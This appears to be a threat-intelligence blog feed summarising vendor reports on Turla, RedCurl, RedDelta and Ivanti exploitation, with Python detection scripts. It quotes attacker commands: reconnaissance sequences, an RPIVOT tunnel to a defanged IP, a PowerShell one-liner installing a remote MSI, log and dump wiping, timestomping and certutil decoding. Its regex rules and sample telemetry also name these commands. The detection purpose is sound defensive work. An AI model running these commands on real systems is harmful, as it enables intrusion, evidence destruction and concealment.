Posts

012. They Want to Know Everything About Your System!

Hello everyone! Today we'll look at reconnaissance techniques leveraged by Secret Blizzard (also known as Turla), as described in a report by Microsoft Threat Intelligence. In this campaign Secret Blizzard used the Amadey bot to download its own backdoors to specifically selected target devices associated with the Ukrainian military. One of the batch scripts leveraged by the adversary invoked a long series of reconnaissance commands. Let's look at each of them:

ver - to collect the OS version;
systeminfo - to collect detailed information about the compromised system;
ipconfig /all - to collect the full TCP/IP configuration for all adapters;
ipconfig /displaydns - to collect the contents of the DNS client resolver cache;
route print - to collect the entries in the local IP routing table;
arp -a - to collect the current ARP cache tables for all interfaces;
netstat -a -n - to collect active connections and listening ports, with addresses shown numerically;
net share - to collect information on ...
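Individually, every command above is something an administrator runs; the signal is several of them fired from one host within a short window, usually from the same parent. As an added example (not code from the Microsoft report or from this blog), here is a small Python detection that normalises process-creation command lines, maps them to the discovery commands listed above and alerts per host on a burst of distinct ones. The host names, timestamps, parent process names and benign events are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands from the batch script described above, keyed by a regex
# over the normalised command line (lower-cased, double quotes removed,
# directory of the first token stripped, leading "cmd.exe /c" removed).
RECON_PATTERNS = [
    ("ver",                  re.compile(r"^ver$")),
    ("systeminfo",           re.compile(r"^systeminfo(\.exe)?\b")),
    ("ipconfig /all",        re.compile(r"^ipconfig(\.exe)?\s+/all\b")),
    ("ipconfig /displaydns", re.compile(r"^ipconfig(\.exe)?\s+/displaydns\b")),
    ("route print",          re.compile(r"^route(\.exe)?\s+print\b")),
    ("arp -a",               re.compile(r"^arp(\.exe)?\s+-a\b")),
    ("netstat -a -n",        re.compile(r"^netstat(\.exe)?\s+(-a\s+-n|-an|-n\s+-a|-na)\b")),
    ("net share",            re.compile(r"^net1?(\.exe)?\s+share\b")),
]
CMD_PREFIX = re.compile(r"^cmd(\.exe)?\s+/[ck]\s+")  # "ver" is a cmd.exe builtin


def normalize(cmdline):
    """Lower-case, drop double quotes, strip the first token's directory and any cmd /c wrapper."""
    s = cmdline.replace('"', "").strip().lower()
    if not s:
        return ""
    head, _, tail = s.partition(" ")
    norm = (head.rsplit("\\", 1)[-1] + " " + tail.strip()).strip()
    return CMD_PREFIX.sub("", norm)


def classify(cmdline):
    """Name of the recon command this command line runs, or None."""
    norm = normalize(cmdline)
    for name, pattern in RECON_PATTERNS:
        if pattern.search(norm):
            return name
    return None


def detect_recon_bursts(events, min_distinct=5, window=timedelta(minutes=5)):
    """One alert per host for each run of >= min_distinct different recon commands within `window`."""
    by_host = defaultdict(list)
    for ev in events:
        name = classify(ev["cmdline"])
        if name:
            by_host[ev["host"]].append((ev["time"], name, ev.get("parent", "")))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        i = 0
        while i < len(hits):
            start = hits[i][0]
            burst = [h for h in hits[i:] if h[0] - start <= window]
            names = sorted({h[1] for h in burst})
            if len(names) >= min_distinct:
                alerts.append({"host": host, "start": start, "commands": names,
                               "parents": sorted({h[2] for h in burst})})
                i += len(burst)  # one alert per burst, then skip past it
            else:
                i += 1
    return alerts


# Constructed sample telemetry (not from the report): WS01 runs the whole
# discovery sequence from one cmd.exe within half a minute; WS02 is an admin
# poking at the network over an hour and a half.
T0 = datetime(2025, 1, 15, 9, 0, 0)


def ev(host, offset_s, cmdline, parent="cmd.exe"):
    return {"host": host, "time": T0 + timedelta(seconds=offset_s),
            "cmdline": cmdline, "parent": parent}


SAMPLE_EVENTS = [
    ev("WS01", 0, "cmd.exe /c ver"),
    ev("WS01", 3, r"C:\Windows\system32\systeminfo.exe"),
    ev("WS01", 9, "ipconfig /all"),
    ev("WS01", 12, "ipconfig /displaydns"),
    ev("WS01", 15, "route print"),
    ev("WS01", 18, "arp -a"),
    ev("WS01", 21, "netstat -a -n"),
    ev("WS01", 24, "net share"),
    ev("WS01", 30, "ping 10.0.0.1"),
    ev("WS02", 0, "ipconfig /all", parent="explorer.exe"),
    ev("WS02", 60, "netstat -an", parent="explorer.exe"),
    ev("WS02", 5400, "arp -a", parent="explorer.exe"),
]

if __name__ == "__main__":
    for alert in detect_recon_bursts(SAMPLE_EVENTS):
        print(alert["host"], alert["start"], alert["parents"], alert["commands"])
```

The threshold and window are the tuning knobs: five distinct commands in five minutes is a reasonable starting point on workstations, while on jump hosts you may want to require a non-interactive parent (cmd.exe running a .bat, a scheduled task) before alerting.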

011. Red Wolf Toolset Update

Hello everyone! The adversary toolset is always evolving, and today we'll look at another example of it. Recently Huntress published a report on Red Wolf (also known as RedCurl and Earth Kapre) attacks against several organizations in Canada. The report includes information on a tool we haven't previously observed this activity cluster using. I'm talking about RPIVOT, a tool written in Python for SOCKS tunneling. To execute the tool, the adversary used the following command: pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310 As you can see, we have lots of detection and hunting opportunities: The threat actors abused pcalua.exe (the Program Compatibility Assistant) with the -a parameter for proxy execution. They also leveraged conhost.exe with the -c and --headless parameters to hide the child process window. The adversary used python.exe to execute a script from a suspicious folder - a good hunting candidate. Finally, RPIVOT h...

010. Do You Detect This Example of PowerShell Abuse?

Hello everyone! As you know, PowerShell can be used by the adversary to solve lots of problems, and it's almost impossible to cover all available procedures. Today we are going to look at another curious example of PowerShell abuse. Recently Recorded Future released a report on RedDelta (we track this cluster of espionage activity as Horned Werewolf), which targeted Taiwan, Mongolia, and Southeast Asia with PlugX. Just like Sticky Werewolf, which we discussed a few days ago, the adversary leveraged malicious MSC files. These files abused PowerShell to install a malicious MSI file from a remote resource: powershell.exe -w hidden ($ceed=new-object -comobject 'WindowsInstaller.Installer'); ($ceed.uilevel = 2); ($ceed.installproduct('https[:]//versaillesinfo[.]com/brjwcabz','REMOVE=ALL')); ($ceed.installproduct('https[:]//versaillesinfo[.]com/brjwcabz')) Note that the malicious MSI file doesn't have an .msi extension. The threat actors leveraged the Installer object to silently (Installer.UI...

009. Anti-Forensics and China-nexus

Hello everyone! Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning in mid-December 2024. The vulnerability affects Ivanti Connect Secure VPN appliances, and successful exploitation could result in unauthenticated remote code execution. This activity was attributed to a China-nexus cluster. Even though the threat actors used a zero-day to gain initial access, there are lots of detection and hunting opportunities during post-exploitation! Let's focus on the anti-forensics techniques:

The adversary cleared the kernel ring buffer (the kernel messages shown by dmesg) using dmesg with the -C parameter: dmesg -C
Used sed with the -i parameter to delete matching entries from application log files in place: sed -i '/segfault/d' debuglog
Deleted state dumps and any core dumps using rm with the -rf parameters: rm -rf /data/var/statedumps/*

As you can see, threat actors can make forensic examination a tough task. At the same time, anti-forensic methods are often quite common and easy to dete...
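The three commands above are cheap to catch on any appliance or Linux host that records process executions, because each has a distinctive shape: dmesg with a clear flag, sed editing a log file in place with a delete command, and a recursive forced rm aimed at a dump directory. As an added example (not code from the Mandiant report or from this blog), here are those checks in Python run over a constructed execve-style log; the key=value log format, the host name, the benign look-alike lines and the /data/var/cores path are assumptions made for the example.

```python
import os
import re
import shlex

# Constructed process-execution log (one key=value record per line) for an
# appliance shell. These lines are made up for the example; they are not
# telemetry from the Mandiant report. Three of them are the commands quoted
# above, the rest are benign look-alikes that must not fire.
SAMPLE_LOG = """\
ts=2024-12-20T03:12:44Z host=vpn-gw1 uid=0 cmd="dmesg -T"
ts=2024-12-20T03:12:51Z host=vpn-gw1 uid=0 cmd="dmesg -C"
ts=2024-12-20T03:13:02Z host=vpn-gw1 uid=0 cmd="sed -i '/segfault/d' debuglog"
ts=2024-12-20T03:13:10Z host=vpn-gw1 uid=0 cmd="sed -i 's/^Port 22/Port 2222/' /etc/ssh/sshd_config"
ts=2024-12-20T03:13:40Z host=vpn-gw1 uid=0 cmd="rm -rf /data/var/statedumps/*"
ts=2024-12-20T03:13:41Z host=vpn-gw1 uid=0 cmd="rm -rf /tmp/build"
ts=2024-12-20T03:14:00Z host=vpn-gw1 uid=0 cmd="rm -rf /data/var/cores/*"
"""

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
LOG_NAME = re.compile(r"(log|messages|auth|audit|wtmp|btmp|debug)", re.I)   # log-looking file names
DUMP_PATH = re.compile(r"(statedump|cores?\b|dumps?\b|crash)", re.I)         # dump-looking paths


def parse_line(line):
    """Turn 'k=v k="v with spaces"' into a dict (quoted or bare value)."""
    return {k: (q or b) for k, q, b in KV.findall(line)}


def argv_of(cmd):
    """Split a command string like a shell would and keep only the program's basename."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: still inspect what we can
        argv = cmd.split()
    if argv:
        argv[0] = os.path.basename(argv[0])
    return argv


def is_dmesg_clear(argv):
    """dmesg -C / -c / --clear wipes the kernel ring buffer."""
    return bool(argv) and argv[0] == "dmesg" and any(
        a in ("-C", "-c", "--clear") for a in argv[1:])


def is_sed_inplace_log_delete(argv):
    """sed -i with a /regex/d delete command applied to a log-looking file."""
    if not argv or argv[0] != "sed":
        return False
    args = argv[1:]
    in_place = any(a == "--in-place" or a.startswith("-i") for a in args)
    delete_cmd = any(a.endswith("/d") for a in args)
    log_file = any(LOG_NAME.search(a) for a in args if not a.startswith("-"))
    return in_place and delete_cmd and log_file


def is_dump_wipe(argv):
    """rm with recursive and force flags against state/core dump locations."""
    if not argv or argv[0] != "rm":
        return False
    short = "".join(a[1:] for a in argv[1:] if a.startswith("-") and not a.startswith("--"))
    recursive = "r" in short or "R" in short or "--recursive" in argv
    force = "f" in short or "--force" in argv
    targets = [a for a in argv[1:] if not a.startswith("-")]
    return recursive and force and any(DUMP_PATH.search(t) for t in targets)


RULES = [
    ("dmesg_ring_buffer_clear", is_dmesg_clear),
    ("sed_inplace_log_delete", is_sed_inplace_log_delete),
    ("dump_wipe", is_dump_wipe),
]


def scan(log_text):
    """Return one finding per (line, rule) match, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if "cmd" not in rec:
            continue
        argv = argv_of(rec["cmd"])
        for name, check in RULES:
            if check(argv):
                findings.append({"ts": rec.get("ts"), "host": rec.get("host"),
                                 "rule": name, "cmd": rec["cmd"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["host"], f["rule"], "|", f["cmd"])
```

On a real appliance the same checks fit naturally as auditd rules on the dmesg, sed and rm binaries with uid=0, but keeping the matching logic outside the box matters here: the adversary is deleting logs on the device, so the process records must already have been shipped elsewhere for any of this to be seen.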

008. How Stealthy is Installation of an Advanced Backdoor?

Hello everyone! Yesterday I checked a fresh report by Kaspersky on the EAGERBEE backdoor, which has potential connections with the CoughingDown threat group. We already talked a bit about how noisy APT groups are in reality and how easy it is to detect malicious activity if you really want to, and this backdoor is another great example. Let's look at the installation routine described in the report. First of all, to hinder forensic analysis, the adversary uses a timestomping technique abusing PowerShell (the variable names were lost from this excerpt and are shown here with the placeholders $date and $file): powershell.exe -Command "$date='1/8/2019 9:57'; $file='C:\users\public\ntusers0.dat';(Get-Item $file).creationtime = $date;(Get-Item $file).lastaccesstime = $date;(Get-Item $file).lastwritetime = $date" Remember, PowerShell can be used to solve hundreds of tasks during the attack lifecycle, so make sure you have detection analytics for timestomping. Another technique used during the installation routine is changing file attributes to hide the files, abusing attrib.exe: attrib.exe +s +h +a C:\users\publ...

007. A Curious Case of Microsoft Management Console Abuse

Hello everyone! As you know, phishing emails are still the most common way to deliver malware. Malicious attachments may include Microsoft Word documents, Microsoft Excel spreadsheets, executables with a double extension, LNK files and many others. Some time ago we observed Sticky Werewolf using MSC files to deliver a Sliver implant to the compromised system. Windows MSC files are used by the Microsoft Management Console to manage various aspects of the operating system or to create custom views of commonly accessed tools. Although it's not a very common file type among adversaries, the installation routine is quite noisy and offers defenders lots of detection and hunting opportunities, for example: Execution of MSC files from suspicious locations with mmc.exe ( mmc.exe C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc ) Certutil abuse for decoding MSC files ( certutil -decode "C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc" C:\Users\Victim\AppDat...
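The command-line indicators from posts 011 (pcalua.exe -a, conhost.exe --headless, python.exe under ProgramData), 010 (the WindowsInstaller.Installer COM object pulling an MSI from a URL), 008 (PowerShell timestomping and attrib +s +h) and 007 (mmc.exe running an .msc from a temp folder, certutil -decode) are all visible in process-creation telemetry. As an added example, not code from any of the cited reports or from this blog, here they are expressed as small rules over lower-cased Sysmon EID 1 / 4688-style records in Python. The sample events are constructed: the pcalua.exe, PowerShell Installer, mmc.exe and certutil command lines are the ones quoted in the posts, while the timestomping variable names ($date, $file), the full attrib.exe target path and the certutil output path are placeholders, since the excerpts truncate them; the benign events are made up.

```python
import re

# Each rule: optional regex on the image path plus command-line regexes that
# must all match. Records are lower-cased before matching.
RULES = [
    {"name": "pcalua_proxy_execution",                   # post 011
     "image": r"\\pcalua\.exe$", "cmdline": [r"(^|\s)-a(\s|$)"]},
    {"name": "conhost_headless_child",                   # post 011
     "cmdline": [r"conhost\.exe.*--headless"]},
    {"name": "python_in_programdata",                    # post 011
     "cmdline": [r"\\programdata\\\S*python\.exe"]},
    {"name": "powershell_installer_com_remote_msi",      # post 010
     "image": r"\\powershell\.exe$",
     "cmdline": [r"windowsinstaller\.installer", r"""installproduct\s*\(\s*['"]https?"""]},
    {"name": "powershell_timestomp",                     # post 008
     "image": r"\\powershell\.exe$",
     "cmdline": [r"\(get-item\s+\S+\)\.(creationtime|lastwritetime|lastaccesstime)\s*="]},
    {"name": "attrib_hidden_system",                     # post 008
     "image": r"\\attrib\.exe$", "cmdline": [r"\+s\b", r"\+h\b"]},
    {"name": "mmc_msc_from_user_writable_dir",           # post 007
     "image": r"\\mmc\.exe$",
     "cmdline": [r"\.msc\b", r"\\(appdata\\local\\temp|users\\public|downloads)\\"]},
    {"name": "certutil_decode",                          # post 007
     "image": r"\\certutil\.exe$", "cmdline": [r"\s-?decode\b"]},
]


def match_rule(rule, event):
    image = event["image"].lower()
    cmdline = event["cmdline"].lower()
    if "image" in rule and not re.search(rule["image"], image):
        return False
    return all(re.search(p, cmdline) for p in rule["cmdline"])


def hunt(events):
    """Return (event index, rule name) for every rule that fires on every event."""
    return [(i, rule["name"]) for i, ev in enumerate(events)
            for rule in RULES if match_rule(rule, ev)]


def event(image, cmdline, parent):
    return {"image": image, "cmdline": cmdline, "parent_image": parent}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (see the lead-in for which parts are placeholders).
SAMPLE_EVENTS = [
    event(r"C:\Windows\System32\pcalua.exe",
          r"pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe "
          r"C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310",
          r"C:\Windows\System32\cmd.exe"),
    event(r"C:\ProgramData\ControlsUp\python.exe",
          r"C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310",
          r"C:\Windows\System32\conhost.exe"),
    event(PS,
          "powershell.exe -w hidden ($ceed=new-object -comobject 'WindowsInstaller.Installer'); "
          "($ceed.uilevel = 2); ($ceed.installproduct('https[:]//versaillesinfo[.]com/brjwcabz','REMOVE=ALL')); "
          "($ceed.installproduct('https[:]//versaillesinfo[.]com/brjwcabz'))",
          r"C:\Windows\System32\mmc.exe"),
    event(PS,
          r'''powershell.exe -Command "$date='1/8/2019 9:57'; $file='C:\users\public\ntusers0.dat';'''
          r'''(Get-Item $file).creationtime = $date;(Get-Item $file).lastaccesstime = $date;(Get-Item $file).lastwritetime = $date"''',
          r"C:\Windows\System32\cmd.exe"),
    event(r"C:\Windows\System32\attrib.exe", r"attrib.exe +s +h +a C:\users\public\ntusers0.dat",
          r"C:\Windows\System32\cmd.exe"),
    event(r"C:\Windows\System32\mmc.exe", r"mmc.exe C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc",
          r"C:\Windows\explorer.exe"),
    event(r"C:\Windows\System32\certutil.exe",
          r'certutil -decode "C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc" C:\Users\Victim\AppData\Local\Temp\decoded.msc',
          r"C:\Windows\System32\cmd.exe"),
    # benign activity that must not fire
    event(PS, "powershell.exe -Command Get-Date", r"C:\Windows\explorer.exe"),
    event(r"C:\Windows\System32\mmc.exe", r"mmc.exe C:\Windows\System32\compmgmt.msc", r"C:\Windows\explorer.exe"),
    event(r"C:\Python312\python.exe", r"C:\Python312\python.exe C:\Users\dev\app.py", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, name in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"].rsplit("\\", 1)[-1], name)
```

Note that the pcalua.exe record alone trips three rules, because the whole launch chain (conhost.exe --headless, python.exe in ProgramData) is present in its command line before the child processes even exist; rules on the parent's command line therefore fire earlier than rules on the children's images.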

006. They Will Steal All Passwords from Any App with This Tool

Hello everyone! As you know, almost any attack includes a credential access stage. I think many of you are well aware of tools like Mimikatz or LaZagne. But threat actors may be much more creative in their attempts to obtain credential material. For example, recently we saw threat actors involved in ransomware attacks in the CIS actively using XenArmor All-In-One Password Recovery Pro. It's a legitimate password recovery tool, which can recover data from 270+ different applications. Not bad, right? Of course, it's used beyond the CIS as well. For example, it was used by the ransomware gang behind AvosLocker. It's also widely used as a malware module, for example in XWorm. Currently it's detected quite well by various antivirus products, as seen on VirusTotal. Also, here are some detection and hunting tips if you don't trust your security software: Look for files with "XenArmor All-In-One Password Recovery Pro", "All-In-One Password Recovery Pro...